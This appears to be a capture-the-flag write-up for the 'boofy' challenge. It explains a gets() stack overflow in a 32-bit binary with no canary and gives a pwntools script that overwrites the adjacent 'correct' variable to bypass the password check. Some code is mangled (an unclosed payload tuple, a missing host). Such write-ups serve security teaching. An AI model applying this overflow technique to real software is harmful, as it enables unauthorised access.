This program looks like it’s password protected, but we can’t seem to find the correct password.
nc 6003
Files: repo
Binary info:
boofy: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked,
interpreter /lib/ld-, for GNU/Linux 3.2.0, BuildID[sha1]=3d900c837e32043007c852a8c880bbb3c6d762eb, with debug_info, not stripped
Canary : ✘
NX : ✓
PIE : ✘
Fortify : ✘
RelRO : ✘
Decompiling binary shows obvious stack overflow vulnerability by using function gets
We can see that buffer that we are reading to has 20 bytes, and then there is variable correct
right after it set to 0
. We need to overflow buffer and override value of correct
to 1
We can do it by sending following payload:
payload = (
b "A" * 20 +
b " \x01 "
io . sendline ( payload )
Full exploit
#!/usr/bin/env python3
from pwn import *
exe = context . binary = ELF ( './boofy' )
host = args . HOST or ''
port = int ( args . PORT or 6003 )
def local ( argv = [], * a , ** kw ):
if args . GDB :
return gdb . debug ([ exe . path ] + argv , gdbscript = gdbscript , * a , ** kw )
else :
return process ([ exe . path ] + argv , * a , ** kw )
def remote ( argv = [], * a , ** kw ):
io = connect ( host , port )
if args . GDB :
gdb . attach ( io , gdbscript = gdbscript )
return io
def start ( argv = [], * a , ** kw ):
if args . LOCAL :
return local ( argv , * a , ** kw )
else :
return remote ( argv , * a , ** kw )
gdbscript = '''
tbreak main
''' . format ( ** locals ())
io = start ()
io . recvuntil ( "Please enter the password? \n " )
payload = (
b "A" * 20 +
b " \x01 "
io . sendline ( payload )
io . interactive ()